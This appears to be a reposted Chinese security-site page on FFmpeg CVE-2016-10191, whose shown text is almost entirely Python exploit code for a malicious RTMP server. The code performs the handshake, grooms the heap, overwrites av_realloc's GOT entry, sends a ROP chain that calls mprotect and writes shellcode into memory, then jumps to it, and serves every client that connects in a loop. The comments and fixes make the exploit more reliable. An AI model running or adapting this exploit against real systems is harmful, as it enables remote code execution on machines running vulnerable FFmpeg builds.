
FFmpeg 漏洞研究及利用,漏洞编号:CVE-2016-10191

来源:本站整理 作者:佚名 时间:2017-09-21 TAG: 我要投稿
data += p64(write_location) # write_location - data
 
data += p32(size) # size
data += p32(0) # offset
data += p64(0x180) # read
return data
 
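def p24(data):
    """Pack ``data`` as a 3-byte big-endian integer (RTMP chunk-header field).

    Args:
        data: integer in the range ``0 <= data < 2**24``.

    Returns:
        The 3-byte big-endian encoding of ``data`` (same type as the other
        ``pNN`` packers: ``str`` on Python 2, ``bytes`` on Python 3).

    Raises:
        ValueError: if ``data`` does not fit in 24 bits. The previous
            version silently dropped the high byte, which would emit a wrong
            chunk size and corrupt the rest of the stream; the old
            ``assert`` only checked the output length, which is always 3.
    """
    import struct
    if not 0 <= data < (1 << 24):
        raise ValueError('p24: value does not fit in 24 bits: %r' % (data,))
    # Big-endian 32-bit pack, then drop the (zero) most significant byte.
    return struct.pack('>I', data)[1:]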
 
 
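def _recv_exact(sock, nbytes):
    """Read exactly ``nbytes`` from ``sock``, looping over short reads.

    A single ``recv()`` may return fewer bytes than requested; a short read
    of the 1536-byte C1/C2 handshake blocks would leave client bytes
    unread and desynchronise everything sent afterwards.

    Args:
        sock: connected socket.
        nbytes: number of bytes to read.

    Returns:
        The bytes read, exactly ``nbytes`` long.

    Raises:
        socket.error: if the peer closes the connection early.
    """
    chunks = []
    remaining = nbytes
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            raise socket.error(
                'peer closed connection with %d bytes outstanding' % remaining)
        chunks.append(chunk)
        remaining -= len(chunk)
    return ''.join(chunks)


def _rtmp_handshake(client_socket):
    """Complete the RTMP handshake (C0/S0, S1/S2, C1/C2) with the client.

    The server-version field of S1 is left all-zero; per the original
    author's note this keeps the client from entering its version
    validation path.

    Args:
        client_socket: accepted, connected socket to the target client.
    """
    _recv_exact(client_socket, 1)            # C0: client protocol version (ignored)
    client_socket.sendall(p8(3))             # S0: server protocol version

    payload = ''
    payload += '\x00' * 4                    # timestamp (apparently unused by the client)
    payload += '\x00' * 4                    # server version; all-zero skips the client's check
    payload += os.urandom(1536 - 8)          # the remainder is random filler
    client_socket.sendall(payload)           # S1
    client_socket.sendall(payload)           # S2 (same bytes as S1)

    _recv_exact(client_socket, 1536)         # C1
    _recv_exact(client_socket, 1536)         # C2
    # The handshake is complete at this point.


def _build_rop():
    """Build the ROP chain delivered after the GOT overwrite.

    The chain calls ``mprotect(shellcode_location, 0x1000, 7)`` (7 = RWX),
    copies ``shellcode`` to ``shellcode_location`` eight bytes at a time
    through ``mov_gadget``, and ends with ``shellcode_location`` so the last
    gadget's ``ret`` lands in the shellcode. The gadget addresses,
    ``shellcode`` and ``shellcode_location`` are module-level values defined
    earlier in the file.

    Returns:
        The chain padded with ``'X'`` up to a multiple of 0x80 bytes, so it
        can be sent in 0x80-byte packets.
    """
    rop = ''
    rop += 'AAAAAAAA' * 6                    # padding

    # mprotect(shellcode_location, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC)
    rop += p64(pop_rdi)
    rop += p64(shellcode_location)           # author's note: not on the heap, presumably because a heap address is hard to leak
    rop += p64(pop_rsi)
    rop += p64(0x1000)
    rop += p64(pop_rdx)
    rop += p64(7)
    rop += p64(plt_mprotect)

    # Write the shellcode through the chain, 8 bytes per mov gadget
    # (pop rax = destination, pop rsi = data, mov_gadget presumably stores
    # rsi at [rax]). The last slice is NUL-padded to 8 bytes: the previous
    # zip(*[iter(shellcode)]*8) silently dropped a trailing partial group,
    # truncating any shellcode whose length is not a multiple of 8. The
    # padding sits after the shellcode's end and is never executed.
    write_location = shellcode_location
    for off in range(0, len(shellcode), 8):
        shell = shellcode[off:off + 8].ljust(8, '\x00')
        rop += p64(pop_rax)
        rop += p64(write_location)
        rop += p64(pop_rsi)
        rop += shell
        rop += p64(mov_gadget)
        write_location += 8

    rop += p64(shellcode_location)           # final ret into the shellcode
    rop += 'X' * (0x80 - (len(rop) % 0x80))  # align to 0x80 bytes (kept as in the original: a full 0x80 of padding when already aligned)
    return rop


def handle_request(client_socket):
    """Run the full exploit sequence against one connected RTMP client.

    Order matters: handshake, two heap-grooming packets, a packet that
    rewrites a chunk header and plants the trampoline, a packet carrying a
    fake RTMPPacket pointing at av_realloc's GOT entry, the GOT overwrite
    itself, the ROP chain, and finally a dummy packet that makes the target
    call av_realloc (now our gadget).

    Every send uses ``sendall()`` so a partial ``send()`` cannot truncate a
    packet, and the socket is closed even if the client drops mid-sequence.
    ``create_payload``, ``create_rtmp_packet``, ``p64`` and the gadget /
    address constants are defined earlier in the file.

    Args:
        client_socket: accepted, connected socket to the target client.
    """
    try:
        _rtmp_handshake(client_socket)

        print('sending payload')
        # Heap grooming.
        client_socket.sendall(create_payload(0xa0, 'U' * 0x80, 4))
        client_socket.sendall(create_payload(0xa0, 'A' * 0x80, 20))

        data = ''
        data += 'U' * 0x20                   # the rest of the chunk
        data += p64(0)                       # zero bytes
        data += p64(0x6a1)                   # real size of the chunk; may need adjusting to the target build
        data += p64(add_esp_f8)              # trampoline to the ROP chain
        data += 'Y' * (0x30 - 8)             # channel_zero: fills RTMPPacket[0]
        data += 'Y' * 0x20                   # channel_one: fills part of RTMPPacket[1]
        # The target does not crash yet at this step (original author's observation).
        client_socket.sendall(create_payload(0x2000, data, 4))

        data = ''
        data += 'I' * 0x10                   # fill the previous RTMPPacket[1]
        data += create_rtmp_packet(2, got_realloc)
        data += 'D' * (0x80 - len(data))     # pad to 0x80 bytes
        client_socket.sendall(create_payload(0x1800, data, 4))

        # Overwrite av_realloc's GOT entry with the pivot gadget (mov rsp, rax by its name).
        jmp_to_rop = p64(mov_rsp_rax)
        jmp_to_rop += 'A' * (0x80 - len(jmp_to_rop))
        client_socket.sendall(create_payload(0x1800, jmp_to_rop, 2))

        # Deliver the ROP chain in 0x80-byte packets.
        rop = _build_rop()
        for off in range(0, len(rop), 0x80):
            client_socket.sendall(create_payload(0x2000, rop[off:off + 0x80], 4))

        # The content does not matter: this packet only has to reach
        # ff_rtmp_check_alloc_array so that av_realloc(our_data) is called.
        client_socket.sendall(create_payload(1, 'A', 63))

        sleep(3)                             # presumably gives the target time to run the shellcode before the close
        print('sending done')
    finally:
        client_socket.close()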
 
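if __name__ == '__main__':
    # Serve one client at a time; each accepted connection gets the full
    # exploit sequence. bind_ip / bind_port are defined earlier in the file.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow immediate rebinding after a restart; without this a lingering
    # TIME_WAIT connection makes bind() fail with EADDRINUSE.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((bind_ip, bind_port))
    s.listen(5)

    try:
        while True:
            print('Waiting for new client...')
            client_socket, addr = s.accept()
            print('client %s:%d connected' % addr)
            try:
                handle_request(client_socket)
            except socket.error as err:
                # A client that drops mid-exploit must not kill the accept loop.
                print('client %s:%d error: %s' % (addr[0], addr[1], err))
    finally:
        s.close()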

